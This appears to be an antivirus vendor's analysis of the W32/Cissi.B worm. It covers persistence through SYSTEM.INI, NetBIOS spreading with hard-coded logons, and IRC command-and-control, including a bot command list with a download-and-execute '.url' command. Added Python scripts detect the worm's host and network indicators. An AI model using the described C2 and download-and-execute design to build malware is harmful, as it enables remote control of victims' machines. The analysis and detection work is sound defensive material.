W32/Cissi.B!worm
Analysis
Specifics
This virus is 32-bit with a packed file size of 21,504 bytes. It contains code to connect with computers across a network and also to join an IRC chat server to receive commands from a malicious user.
Loading At Windows Startup
If the virus is run, it may copy itself into the Windows folder as "penis.exe" and modify the configuration file SYSTEM.INI so that this file is loaded as a shell application alongside the common shell EXPLORER.EXE.
NetBIOS Infection Method
This virus will attempt to connect with random IP addresses using NetBIOS. For each system found, the virus will use a table of hard-coded logon names and passwords to gain access to that system. If the virus is able to log into the target, it will copy itself as the file "setup.exe" to any of three hard-coded paths -
\Documents and Settings\All Users\Start Menu\Programs\Startup\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
When the target system restarts Windows, the virus will run and start its cycle again.
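The two host-side traces described above (an extra executable on the SYSTEM.INI shell= line next to EXPLORER.EXE, and a "setup.exe" dropped into one of the three Startup folders) can be checked from a file listing and a copy of SYSTEM.INI. The following Python is an added example written for this page, not Fortinet's code; the SYSTEM.INI contents and file paths it uses are constructed samples, and the only indicators it relies on are the ones named in the analysis.

```python
"""Host-side persistence check for the indicators described in the analysis.

Added example, not Fortinet's code. Assumes only what the text states: the
worm appends itself to the [boot] shell= line of SYSTEM.INI alongside
explorer.exe, and drops setup.exe into one of three hard-coded Startup folders.
"""
import re

# Constructed sample SYSTEM.INI contents (not captured from a real host).
CLEAN_SYSTEM_INI = """[boot]
shell=explorer.exe
[386Enh]
"""

SUSPECT_SYSTEM_INI = """[boot]
shell=explorer.exe penis.exe
[386Enh]
"""

# Startup folder paths from the analysis, relative to the drive root.
STARTUP_PATHS = [
    r"\Documents and Settings\All Users\Start Menu\Programs\Startup",
    r"\WINDOWS\Start Menu\Programs\Startup",
    r"\WINNT\Profiles\All Users\Start Menu\Programs\Startup",
]


def shell_entries(system_ini_text):
    """Return the executables named on the [boot] shell= line, in order."""
    in_boot = False
    for line in system_ini_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_boot = stripped.lower() == "[boot]"
            continue
        if in_boot:
            m = re.match(r"shell\s*=\s*(.*)", stripped, re.IGNORECASE)
            if m:
                return m.group(1).split()
    return []


def extra_shell_executables(system_ini_text, expected=("explorer.exe",)):
    """Anything on the shell= line other than the expected shell is suspicious.
    The comparison is case-insensitive; the unexpected entries are returned."""
    return [e for e in shell_entries(system_ini_text) if e.lower() not in expected]


def suspicious_startup_files(present_paths, dropped_name="setup.exe"):
    """Given file paths found on the host (for example from os.walk), return
    those that are a file named dropped_name inside one of the Startup
    folders the worm writes to. Matching is case-insensitive."""
    hits = []
    for p in present_paths:
        folder, _, name = p.rpartition("\\")
        in_startup = any(folder.lower().endswith(s.lower()) for s in STARTUP_PATHS)
        if name.lower() == dropped_name and in_startup:
            hits.append(p)
    return hits


if __name__ == "__main__":
    # Constructed file listing: one hit in a Startup folder, one benign installer.
    listing = [
        r"C:\WINDOWS\Start Menu\Programs\Startup\setup.exe",
        r"C:\Program Files\SomeApp\setup.exe",
    ]
    print("unexpected shell entries:", extra_shell_executables(SUSPECT_SYSTEM_INI))
    print("suspicious startup files:", suspicious_startup_files(listing))
```

On a live host the file listing would come from walking each drive root, and SYSTEM.INI would be read from the Windows folder; the functions are kept input-only so they can also run against an offline disk image or a collected triage package.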
IRC Server Connection Routine
The virus may attempt to connect to the IRC server uk.undernet.org (IP address 213.48.150.1). The virus will connect using the common IRC connection TCP port 6667. It will join the channel "#peniz" and await instructions from a malicious user. Instructions could include -
.aids
.appendfile
.closefile
.com
.createfile
.deletefile
.executefile
.exit
.hidden
.login
.logout
.nettalk
.newnick
.pingtalk
.quit
.silence
.update
.url
.visitpage
.writeline
.writetext
The instruction ".url" is used with a parameter - by passing the web site name and hosted file, the virus will use HTTP to retrieve the file and execute it. For instance, if the virus receives the instruction
.url http://a web site name/folder/a file.exe
the virus will download the file over TCP port 80 and then execute it. If the virus receives the command ".aids", the virus will exit the IRC channel and post this exit message -
"Aids infected my brain and my butt."
Recommended Action
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
- If IRC is not used in your organization, block internal to external and external to internal access using TCP port 6667
- If NetBIOS browsing is not used in your organization, block internal to external and external to internal access using TCP ports 135 and 139
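The network behaviour in the IRC section and the port-blocking advice above share the same three indicators: traffic crossing the network boundary on TCP 6667, traffic crossing it on TCP 135/139, and any connection to the C2 address the analysis names. The following Python is an added example for this page, not Fortinet's code: it triages flow-log lines against those indicators. The log format, the internal address ranges (RFC 1918) and the sample lines are constructed assumptions for the example; the ports and the address 213.48.150.1 come from the analysis.

```python
"""Flow-log triage for the indicators in the analysis: IRC C2 on TCP 6667
(the analysis names uk.undernet.org / 213.48.150.1) and NetBIOS spreading on
TCP 135/139 across the network boundary.

Added example, not Fortinet's code. The log line format and the sample lines
are constructed for this example.
"""
import ipaddress

# Assumption: the organization's internal space is the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
C2_IP = "213.48.150.1"      # from the analysis text
IRC_PORT = 6667             # from the analysis text
NETBIOS_PORTS = {135, 139}  # from the recommended action

# Constructed sample log lines: "<time> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>"
SAMPLE_LOG = """\
12:00:01 192.168.1.20:1034 -> 213.48.150.1:6667 tcp
12:00:02 192.168.1.20:1035 -> 198.51.100.7:139 tcp
12:00:03 192.168.1.21:1036 -> 192.168.1.22:139 tcp
12:00:04 192.168.1.23:1037 -> 203.0.113.9:80 tcp
12:00:05 203.0.113.50:40000 -> 192.168.1.24:135 tcp
"""


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line):
    """Split one constructed-format log line into its fields."""
    time, src, _arrow, dst, proto = line.split()
    src_ip, _src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"time": time, "src": src_ip, "dst": dst_ip,
            "dport": int(dst_port), "proto": proto.lower()}


def classify(flow):
    """Return the indicator names that apply to a single flow."""
    hits = []
    if flow["proto"] != "tcp":
        return hits
    # "internal to external and external to internal": exactly one side internal.
    crosses_boundary = is_internal(flow["src"]) != is_internal(flow["dst"])
    if flow["dport"] == IRC_PORT and crosses_boundary:
        hits.append("irc-port-6667")
    if flow["dst"] == C2_IP:
        hits.append("known-c2-address")
    if flow["dport"] in NETBIOS_PORTS and crosses_boundary:
        hits.append("netbios-across-boundary")
    return hits


def triage(log_text):
    """Map each flagged log line to its indicators; unflagged lines are omitted."""
    results = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hits = classify(parse_flow(line))
        if hits:
            results[line] = hits
    return results


if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG).items():
        print(f"{line}  ->  {', '.join(hits)}")
```

Internal-to-internal NetBIOS traffic (the third sample line) is deliberately not flagged, because the recommended action only concerns the network boundary and port 139 is ordinary file sharing inside a LAN; spotting the worm's internal spread would instead need the repeated failed logons its hard-coded password table produces, which a flow log does not carry.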
Detection Availability
Product | Database
---|---
FortiGate | Extended
FortiClient | Extreme
FortiAPS |
FortiAPU |
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |